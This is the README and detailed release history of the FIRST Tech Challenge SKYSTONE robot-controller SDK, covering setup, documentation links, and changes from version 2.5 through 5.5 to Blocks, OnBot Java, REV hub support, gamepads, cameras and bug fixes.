you can clone the most current version of the repository: git clone https://github.com/FIRST-Tech-Challenge/SKYSTONE.git Or, if you prefer, you can use the "Download Zip" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder ("Import project (Eclipse ADT, Gradle, etc.)"). Getting Help User Documentation and Tutorials FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation Note that the online documentation is an "evergreen" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system. Javadoc Reference Material The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation Documentation for the FTC SDK is also included with this repository. There is a subfolder called "doc" which contains several subfolders: The folder "apk" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps. The folder "javadoc" contains the JavaDoc user documentation for the FTC SDK. Online User Forum For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum Release Information Version 5.5 (20200824-090813) Version 5.5 requires Android Studio 4.0 or later. New features Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161). Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, regardless of the order of the parameters. On the block, the sockets for those parameters are automatically filled in. Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long, will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, java.lang.Double will accept any block that returns a number. Adds telemetry API method for setting display format Classic Monospace HTML (certain tags only) Adds blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2) Adds new warnings which can be disabled in the Advanced RC Settings Mismatched app versions warning Unnecessary 2.4 GHz WiFi usage warning REV Hub is running outdated firmware (older than version 1.8.2) Adds support for Sony PS4 gamepad, and reworks how gamepads work on the Driver Station Removes preference which sets gamepad type based on driver position. Replaced with menu which allows specifying type for gamepads with unknown VID and PID Attempts to auto-detect gamepad type based on USB VID and PID If gamepad VID and PID is not known, use type specified by user for that VID and PID If gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped If only one gamepad is assigned and it drops: it can be recovered If two gamepads are assigned, and have different VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have different VID/PID signatures, and BOTH drop: both will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and BOTH drop: neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller. Adds landscape user interface to Driver Station New feature: practice timer with audio cues New feature (Control Hub only): wireless network connection strength indicator (0-5 bars) New feature (Control Hub only): tapping on the ping/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back) The layout will NOT autorotate. You can switch the layout from the Driver Station's settings menu. Breaking changes Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23. Removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle() Enhancements Handles RS485 address of Control Hub automatically The Control Hub is automatically given a reserved address Existing configuration files will continue to work All addresses in the range of 1-10 are still available for Expansion Hubs The Control Hub light will now normally be solid green, without blinking to indicate the address The Control Hub will not be shown on the Expansion Hub Address Change settings page Improves REV Hub firmware updater The user can now choose between all available firmware update files Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability Allows REV Hub firmware to be updated directly from the Manage webpage Improves log viewer on Robot Controller Horizontal scrolling support (no longer word wrapped) Supports pinch-to-zoom Uses a monospaced font Error messages are highlighted New color scheme Attempts to force-stop a runaway/stuck OpMode without restarting the entire app Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it. Makes various tweaks to the Self Inspect screen Renames "OS version" entry to "Android version" Renames "WiFi Direct Name" to "WiFi Name" Adds Control Hub OS version, when viewing the report of a Control Hub Hides the airplane mode entry, when viewing the report of a Control Hub Removes check for ZTE Speed Channel Changer Shows firmware version for all Expansion and Control Hubs Reworks network settings portion of Manage page All network settings are now applied with a single click The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels The current WiFi channel is pre-selected on phone-based Robot Controllers, and Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band Improves OnBotJava New light and dark themes replace the old themes (chaos, github, chrome,...) the new default theme is light and will be used when you first update to this version OnBotJava now has a tabbed editor Read-only offline mode Improves function of "exit" menu item on Robot Controller and Driver Station Now guaranteed to be fully stopped and unloaded from memory Shows a warning message if a LinearOpMode exists prematurely due to failure to monitor for the start condition Improves error message shown when the Driver Station and Robot Controller are incompatible with each other Driver Station OpMode Control Panel now disabled while a Restart Robot is in progress Disables advanced settings related to WiFi direct when the Robot Controller is a Control Hub. Tint phone battery icons on Driver Station when low/critical. Uses names "Control Hub Portal" and "Control Hub" (when appropriate) in new configuration files Improve I2C read performance Very large improvement on Control Hub; up to ~2x faster with small (e.g. 6 byte) reads Not as apparent on Expansion Hubs connected to a phone Update/refresh build infrastructure Update to 'androidx' support library from 'com.android.support:appcompat', which is end-of-life Update targetSdkVersion and compileSdkVersion to 28 Update Android Studio's Android plugin to latest Fix reported build timestamp in 'About' screen Add sample illustrating manual webcam use: ConceptWebcam Bug fixes Fixes SkyStone issue #248 Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL/AUTO transitions. Improves performance when REV 2M distance sensor is unplugged Improves readability of Toast messages on certain devices Allows a Driver Station to connect to a Robot Controller after another has disconnected Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number Previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming Fixes ftc_app issue #638. Fixes a slew of bugs with the Vuforia camera monitor including: Fixes bug where preview could be displayed with a wonky aspect ratio Fixes bug where preview could be cut off in landscape Fixes bug where preview got totally messed up when rotating phone Fixes bug where crosshair could drift off target when using webcams Fixes issue in UVC driver on some devices (ftc_app 681) if streaming was started/stopped multiple times in a row Issue manifested as kernel panic on devices which do not have this kernel patch. On affected devices which do have the patch, the issue was manifest as simply a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes bug in UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS). Fixes issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it Preserves the Control Hub's network connection when "Restart Robot" is selected Fixes issue where device scans would fail while the Robot was restarting Fix RenderScript usage Use androidx.renderscript variant: increased compatibility Use RenderScript in Java mode, not native: simplifies build Fixes webcam-frame-to-bitmap conversion problem: alpha channel wasn't being initialized, only R, G, & B Fixes possible arithmetic overflow in Deadline Fixes deadlock in Vuforia webcam support which could cause 5-second delays when stopping OpMode Version 5.4 (20200108-101156) Fixes SkyStone issue #88 Adds an inspection item that notes when a robot controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61 Fixes SkyStone issue #142 Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs. Fixes a crash sometimes caused by OnBotJava activity Improves OnBotJava autosave functionality ftc_app #738 Fixes system responsiveness issue when an Expansion Hub is disconnected Fixes issue where IMU initialization could prevent Op Modes from stopping Fixes issue where AndroidTextToSpeech.speak() would fail if it was called too early Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text Adds and improves Expansion Hub-related warnings Improves Expansion Hub low battery warning Displays the warning immediately after the hub reports it Specifies whether the condition is current or occurred temporarily during an OpMode run Displays which hubs reported low battery Displays warning when hub loses and regains power during an OpMode run Fixes the hub's LED pattern after this condition Displays warning when Expansion Hub is not responding to commands Specifies whether the condition is current or occurred temporarily during an OpMode run Clarifies warning when Expansion Hub is not present at startup Specifies that this condition requires a Robot Restart before the hub can be used. The hub light will now accurately reflect this state Improves logging and reduces log spam during these conditions Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available. Adds bulk read functionality for REV Hubs A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following following Hub bulk caching modes are available: BulkCachingMode.OFF (default): All hardware calls operate as usual. Bulk data can read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: Applicable hardware calls are served from a bulk read cache that is cleared/refreshed automatically to ensure identical commands don't hit the same cache. The cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. (advanced users) BulkCachingMode.MANUAL: Same as BulkCachingMode.AUTO except the cache is never cleared automatically. To avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate. Removes PIDF Annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available but their Default control behavior will revert back to Rev 5.2 Adds new ConceptMotorBulkRead sample Opmode to demonstrate and compare Motor Bulk-Read modes for reducing I/O latencies. Version 5.3 (20191004-112306) Fixes external USB/UVC webcam support Makes various bugfixes and improvements to Blocks page, including but not limited to: Many visual tweaks Browser zoom and window resize behave better Resizing the Java preview pane works better and more consistently across browsers The Java preview pane consistently gets scrollbars when needed The Java preview pane is hidden by default on phones Internet Explorer 11 should work Large dropdown lists display properly on lower res screens Disabled buttons are now visually identifiable as disabled A warning is shown if a user selects a TFOD sample, but their device is not compatible Warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to Robot Configurator Adds PIDF Annotation values to AndyMark, goBILDA and TETRIX motor configurations. This has the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds Feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it "anticipates" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticable the PIDF improvement will be. Fixes startup crash on Android 10 Fixes ftc_app issue #712 (thanks to FROGbots-4634) Fixes ftc_app issue #542 Allows "A" and lowercase letters when naming device through RC and DS apps. Version 5.2 (20190905-083277) Fixes extra-wide margins on settings activities, and placement of the new configuration button Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against Stuck OpModes when a Restart Robot is requested. (Thanks to FROGbots-4634) (ftc_app issue #709) Blocks related changes: Fixes bug with blocks generated code when hardware device name is a java or javascript reserved word. Shows generated java code for blocks, even when hardware items are missing from the active configuration. Displays warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27) Version 5.1 (20190820-222104) Defines default PIDF parameters for the following motors: REV Core Hex Motor REV 20:1 HD Hex Motor REV 40:1 HD Hex Motor Adds back button when running on a device without a system back button (such as a Control Hub) Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB Fixes SkyStone issue #9 Fixes ftc_app issue #715 Prevents extra DS User clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving new OpMode list from RC Adds support for REV Color Sensor V3 Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD—no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to RobotController resources. Added SKYSTONE Sounds Chooser Sample Program. Switches out startup, connect chimes, and error/warning sounds for Star Wars sounds Updates OnBot Java to use a WebSocket for communication with the robot The OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another Known issues: Camera Stream The Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574). This problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview. For now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava Browser back button may not always work correctly It's possible for a build to be queued, but not started. The OnBot Java build console will display a warning if this occurs. A user might not realize they are editing a different file if the user inadvertently switches from one file to another since this switch is now seamless. The name of the currently open file is displayed in the browser tab. Version 5.0 (built on 19.06.14) Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Display wifi channel in Network circle on Driver Station. Adds calibration for Logitech C270 Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (Required after build tooling update). Keep Alives to mitigate the Motorola wifi scanning problem. Telemetry substitute no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements. Version 4.3 (built on 18.10.31) Includes missing TensorFlow-related libraries and files. Version 4.2 (built on 18.10.30) Includes fix to avoid deadlock situation with WatchdogMonitor which could result in USB communication errors. Comm error appeared to require that user disconnect USB cable and restart the Robot Controller app to recover. robotControllerLog.txt would have error messages that included the words "E RobotCore: lynx xmit lock: #### abandoning lock:" Includes fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. Bug in versions 4.0 and 4.1 would incorrect list the address module for a parent REV Robotics device as "1". If the parent module had a higher address value than the daisy-chained module, then this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important Note: Android Studio users will need to be connected to the Internet the first time build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix buid issue where Android Studio would complain that it "Could not find com.android.tools.lint:lint-gradle:26.1.4" (or similar). Added support for REV Spark Mini motor controller as part of the configuration menu for a servo/PWM port on the REV Expansion Hub. Provide examples for playing audio files in an Op Mode. Block Development Tool Changes Includes a fix for a problem with the Velocity blocks that were reported in the FTC Technology forum (Blocks Programming subforum). Change the "Save completed successfully." message to a white color so it will contrast with a green background. Fixed the "Download image" feature so it will work if there are text blocks in the op mode. Introduce support for Google's TensorFlow Lite technology for object detetion for 2018-2019 game. TensorFlow lite can recognize Gold Mineral and Silver Mineral from 2018-2019 game. Example Java and Block op modes are included to show how to determine the relative position of the gold block (left, center, right). Version 4.1 (released on 18.09.24) Changes include: Fix to prevent crash when deprecated configuration annotations are used. Change to allow FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for non supported / non legal hardware. Improvements to Telemetry.addData block with "text" socket. Updated Blocks sample op mode list to include Rover Ruckus Vuforia example. Update SDK library version number. Version 4.0 (released on 18.09.12) Changes include: Initial support for UVC compatible cameras If UVC camera has a unique serial number, RC will detect and enumerate by serial number. If UVC camera lacks a unique serial number, RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode/src/main/res/xml/teamwebcamcalibrations.xml for details). User can upload calibration files from Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam. Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). FTC Blocks development tool modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor. Wireless Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as Samsung Galaxy S8. Improved Expansion Hub firmware update support in Robot Controller app Changes to make the system more robust during the firmware update process (when performed through Robot Controller app). User no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If user is updating an Expansion Hub's firmware through a USB connection, he/she does not have to disconnect RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy chained through an RS485 connection. If an Expansion Hub accidentally gets "bricked" the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. Robot Controller app should be able to detect an Expansion Hub, even if it accidentally was bricked in a previous update attempt. Robot Controller app should be able to install the firmware onto the Hub, even if if accidentally was bricked in a previous update attempt. Resiliency FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps system recover from some ESD-induced disruptions. Various fixes to improve reliability of FTC software. Blocks Fixed errors with string and list indices in blocks export to java. Support for USB connected UVC webcams. Refactored optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under Telemetry and Miscellaneous categories) so user can set how many decimal places to display a numerical value. Support to play audio files (which are uploaded through Blocks web interface) on Driver Station in addition to the Robot Controller. Fixed bug with Download Image of Blocks feature. Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware. The REV Robotics Expansion Hub supports these enhanced methods. Enhanced methods include methods to get/set motor velocity (in encoder pulses per second), get/set PIDF coefficients, etc.. Modest Improvements in Logging Decrease frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a "Match Logging" feature. Under "Settings" a user can enable/disable this feature (it's disabled by default). If enabled, user provides a "Match Number" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in /sdcard/FIRST/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run. New Devices Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added configuration option for REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Miscellaneous Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added ability to play audio files on Driver Station When user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets. Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to "TeleOp" instead of "Autonomous". Known issues: Initial support for UVC compatible cameras UVC cameras seem to draw significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless When user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. Tech Team is hoping to eventually address this issue in a future release. Issue has been present since apps were introduced (i.e., it is not new with the v4.0 release). Wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. User has to first save a newly created configuration file and then close and re-edit the file in order for blink indicator to work. Version 3.6 (built on 17.12.18) Changes include: Blocks Changes Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for setPower() method to reflect correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames Added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method. Version 3.5 (built on 17.10.30) Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes issue with battery handler (voltage) start/stop race. Fixes issue where Android Studio generated op modes would disappear from available list in certain situations. Fixes problem where OnBot Java would not build on REV Robotics Control Hub. Fixes problem where OnBot Java would not build if the date and time on the Robot Controller device was "rewound" (set to an earlier date/time). Improved error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from android.jar binaries used by OnBot Java to reduce final size of Robot Controller app. Added MR_ANALOG_TOUCH_SENSOR block to Blocks Programming Tool. Version 3.4 (built on 17.09.06) Changes with version 3.4 include: Added telemetry.update() statement for BlankLinearOpMode template. Renamed sample Block op modes to be more consistent with Java samples. Added some additional sample Block op modes. Reworded OnBot Java readme slightly. Version 3.3 (built on 17.09.04) This version of the software includes improves for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with verion 3.3 include: Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. Android Studio ftc_app project is already using gradle 3.5 distribution. Robot Controller log has been renamed to /sdcard/RobotControllerLog.txt (note that this change was actually introduced w/ v3.2). Improvements in I2C reliability. Optimized I2C read for REV Expansion Hub, with v1.7 firmware or greater. Updated all external/samples (available through OnBot and in Android project folder). Vuforia Added support for VuMarks that will be used for the 2017-2018 season game. Blocks Update to latest Google Blockly release. Sample op modes can be selected as a template when creating new op mode. Fixed bug where the blocks would disappear temporarily when mouse button is held down. Added blocks for Range.clip and Range.scale. User can now disable/enable Block op modes. Fix to prevent occasional Blocks deadlock. OnBot Java Significant improvements with autocomplete function for OnBot Java editor. Sample op modes can be selected as a template when creating new op mode. Fixes and changes to complete hardware setup feature. Updated (and more useful) onBot welcome message. Known issues: Android Studio After updating to the new v3.3 Android Studio project folder, if you get error messages indicating "InvalidVirtualFileAccessException" then you might need to do a File->Invalidate Caches / Restart to clear the error. OnBot Java Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically suceeds. Version 3.2 (built on 17.08.02) This version of the software introduces the "OnBot Java" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a Javascript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a Javascript-enabled browser (Google Chromse is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio. Changes with version 3.2 include: Enhanced web-based development tools Introduction of OnBot Java Development Tool. Web-based programming and management features are "always on" (user no longer needs to put Robot Controller into programming mode). Web-based management interface (where user can change Robot Controller name and also easily download Robot Controller log file). OnBot Java, Blocks and Management features available from web based interface. Blocks Programming Development Tool: Changed "LynxI2cColorRangeSensor" block to "REV Color/range sensor" block. Fixed tooltip for ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors. Added example op modes for digital touch sensor and REV Robotics Color Distance sensor. User selectable color themes. Includes many minor enhancements and fixes (too numerous to list). Known issues: Auto complete function is incomplete and does not support the following (for now): Access via this keyword Access via super keyword Members of the super cloass, not overridden by the class Any methods provided in the current class Inner classes Can't handle casted objects Any objects coming from an parenthetically enclosed expression Version 3.10 (built on 17.05.09) This version of the software provides support for the REV Robotics Expansion Hub. This version also includes improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated, they have been removed from the SDK). Also note that the the new 3.x software incorporates motor profiles that a user can select as he/she configures the robot. Changes include: Blocks changes Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added atan2 block to the math category. Added useCompetitionFieldTargetLocations parameter to Vuforia.initialize block. If set to false, the target locations are placed at (0,0,0) with target orientation as specified in https://github.com/gearsincorg/FTCVuforiaDemo/blob/master/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions). Additional Notes Regarding Version 3.00 (built on 17.04.13) In addition to the release changes listed below (see section labeled "Version 3.00 (built on 17.04.013)"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra i2c sensors. We hope to re-introduce this function with a release in the near future. Version 3.00 (built on 17.04.13) *** Use this version of the software at YOUR OWN RISK!!! *** This software is being released as an "alpha" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered "alpha" code. This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! *** Changes include: Major rework of sensor-related infrastructure. Includes rewriting sensor classes to implement synchronous I2C communication. Fix to reset Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes telemetry log addition race. Publishes all the sources (not just a select few). Includes Block programming improvements Addition of optimized Vuforia blocks. Auto scrollbar to projects and sounds pages. Fixed blocks paste bug. Blocks execute after while-opModeIsActive loop (to allow for cleanup before exiting op mode). Added gyro integratedZValue block. Fixes bug with projects page for Firefox browser. Added IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub Implements support for integral REV IMU (physically installed on I2C bus 0, uses same Bosch BNO055 9 axis absolute orientation sensor as Adafruit 9DOF abs orientation sensor). - Implements support for REV color/range/light sensor. Provides support to update Expansion Hub firmware through FTC SDK. Detects REV firmware version and records in log file. Includes support for REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for REV Expansion Hub and sensor hardware. Detects and alerts when I2C device disconnect. Version 2.62 (built on 17.01.07) Added null pointer check before calling modeToByte() in finishModeSwitchIfNecessary method for ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness. Version 2.61 (released on 16.12.19) Blocks Programming mode changes: Fix to correct issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor). Version 2.6 (released on 16.12.16) Fixes for Gyro class: Improve (decrease) sensor refresh latency. fix isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration xml if the name is empty. Other devices work in configuration work fine. Version 2.5 (internal release on released on 16.12.13) Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added Download Op Mode button to FtcBocks.html. Added support for copying blocks in one OpMode and pasting them in an other OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified Utilities section of the toolbox. In Programming Mode, display information about the active connections. Fixed paste location when workspace has been scrolled. Added blocks support for the android Accelerometer. Fixed issue where Blocks Upload Op Mode truncated name at first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor. Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. 